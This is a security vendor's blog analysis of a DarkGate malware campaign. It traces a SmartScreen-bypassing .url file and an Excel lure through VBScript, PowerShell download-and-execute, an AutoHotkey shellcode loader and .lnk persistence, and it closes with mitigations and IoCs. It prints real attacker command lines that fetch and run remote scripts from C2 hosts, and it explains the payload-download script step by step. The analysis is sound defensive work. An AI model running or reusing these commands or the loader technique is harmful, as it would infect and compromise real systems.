The file is an Internet Shortcut (.url) file, containing the following content:

Figure 8: content of .URL file

The .url files serve as straightforward INI configuration files, typically consisting of a “URL=” parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.

Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.

The vulnerability CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 to address this vulnerability, it remains exploitable in unpatched versions of Windows.

If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:

Figure 9: SmartScreen prompt

On allowing execution, the vbs file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:

Figure 10: Process tree

Following are the command lines:

  • “C:\Windows\System32\WScript.exe” “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”
    • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • “C:\rjtu\AutoHotkey.exe” C:/rjtu/script.ahk
      • “C:\Windows\system32\attrib.exe” +h C:/rjtu/

The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (‘withupdate.com/zuyagaoq’) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:/rjtu/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:/rjtu/).

Inspecting the URL “withupdate.com/zuyagaoq” explicitly allows for a detailed understanding of the infection flow:

Figure 11: Remote Script on the C2

This URL leads to a script:


Figure 12: Remote Script content
Reformatting, we get:

Figure 13: Remote script content

Explanation of the script:

  • ni ‘C:/rjtu/’ -Type Directory -Force: This command creates a new directory named “rjtu” in the root of the C drive if it doesn’t already exist.
  • cd ‘C:/rjtu/’: This changes the current directory to the newly created “rjtu” directory.
  • Invoke-WebRequest -Uri “http://withupdate.com/oudowibspr” -OutFile ‘C:/rjtu/temp_AutoHotkey.exe’: This command downloads a file from the specified URL and saves it as “temp_AutoHotkey.exe” in the “rjtu” directory.
  • Invoke-WebRequest -Uri “http://withupdate.com/rwlwiwbv” -OutFile ‘C:/rjtu/script.ahk’: This downloads a file named “script.ahk” from another specified URL and saves it in the “rjtu” directory.
  • Invoke-WebRequest -Uri “http://withupdate.com/bisglrkb” -OutFile ‘C:/rjtu/test.txt’: This downloads a file named “test.txt” from yet another specified URL and saves it in the “rjtu” directory.
  • start ‘C:/rjtu/AutoHotkey.exe’ -a ‘C:/rjtu/script.ahk’: This command starts the executable “AutoHotkey.exe” located in the “rjtu” directory and passes “script.ahk” file as an argument.
  • attrib +h ‘C:/rjtu/’: This sets the hidden attribute for the “rjtu” directory.

Checking “C:/rjtu”:

Figure 14: Dropped folder

AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.

To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).

Following is the ahk script file content:

Figure 15: Content of .ahk script

There are a lot of comments added in the script, simplifying the script, we get:

Figure 16: .ahk script after removing junk

This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in “test.txt”.

Now, it’s confirmed that the shellcode resides within the contents of “test.txt”. This is how the text.txt appears:

Figure 17: Content of test.txt

We analyzed the memory in use for Autohotkey.exe.


Figure 18: Memory of running instance of AutoHotKey.exe
We dumped the memory associated with it and found that it was the same as the content in test.txt.

Figure 19: Memory dump of running AutoHotKey.exe same as test.txt

This is the shellcode present here.  The first 6 bytes are assembly instructions:

Figure 20: Shellcode A in the beginning

Following the jump instructions of 3bf bytes, we reach the same set of instructions again:

Figure 21: Same Shellcode A after jump

This means another jump with be taken for another 3bf bytes:

Figure 22: Same Shellcode A one more time

We have encountered same set of instructions again, taking another jump we reach to:

Figure 23: New Shellcode B found next.

These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.

Figure 24: Shellcode B followed by PE file highlighted

This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:

Figure 25: After debugging found next Shellcode C

This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.

Figure 26: Shellcode C directing to entry point of the PE file

Upon debugging this code, we figured out that in marked “call eax” instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.

This is the final DarkGate payload which is a Delphi-compiled executable file:

Figure 27: Darkgate payload.

Upon this, we see all the network activity happening to C2 site:

Figure 28: Network Communication

Figure 29: C2 IP address

The exfiltration is done to the IP address 5.252.177.207.

Persistence:

For maintaining persistence, a .lnk file is dropped in startup folder:

Figure 30: Persistence

Content of lnk file:

Figure 31: Content of .lnk used for persistence

The shortcut file (lnk) drops a folder named “hakeede” in the “C:\ProgramData” directory.

Figure 32: Folder dropped in “C:\ProgramData”

Inside this folder, all the same files are present:

Figure 33: Same set of files present in dropped folder

Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.

Infection from XLS:

The malicious excel file asks the user to click on “Open” to view the content properly.

Figure 34: XLS sample

Upon clicking on “Open” button, user gets the following prompt warning the user before opening the file.

Figure 35: XLS files trying to download and run VBS file

For our analysis, we allowed the activity by clicking on “OK”. Following this we got the process tree as:

Figure 36: Process tree from Excel file

The command lines are:

  • “C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE” “C:\Users\admin\Documents\Cluster\10-apr-xls\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”
    • “C:\Windows\System32\WScript.exe” “\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”
      • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)
        • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        • “C:\kady\AutoHotkey.exe” C:/kady/script.ahk
        • “C:\Windows\system32\attrib.exe” +h C:/kady/

The file it gets from “103.124.106[.]237/wctaehcw” has the following content:

Figure 37: Remote script simliar to previous chain

From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.

Mitigation:

  • Verify Sender Information
  • Think Before Clicking Links and Warnings
  • Check for Spelling and Grammar Errors
  • Be Cautious with Email Content
  • Verify Unusual Requests
  • Use Email Spam Filters
  • Check for Secure HTTP Connections
  • Delete Suspicious Emails
  • Keep Windows and Security Software Up to date

Indicators of Compromise (IoCs):

File Hash
Html file 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
URL file 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833
VBS 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
autohotkey.exe 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
AHK script dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
test.txt 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
DarkGate exe 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031
IP 5.252.177.207
XLS file 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4
VBS 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
LNK file 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e
IP 103.124.106.237

Table 1: IOC table

The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.

❌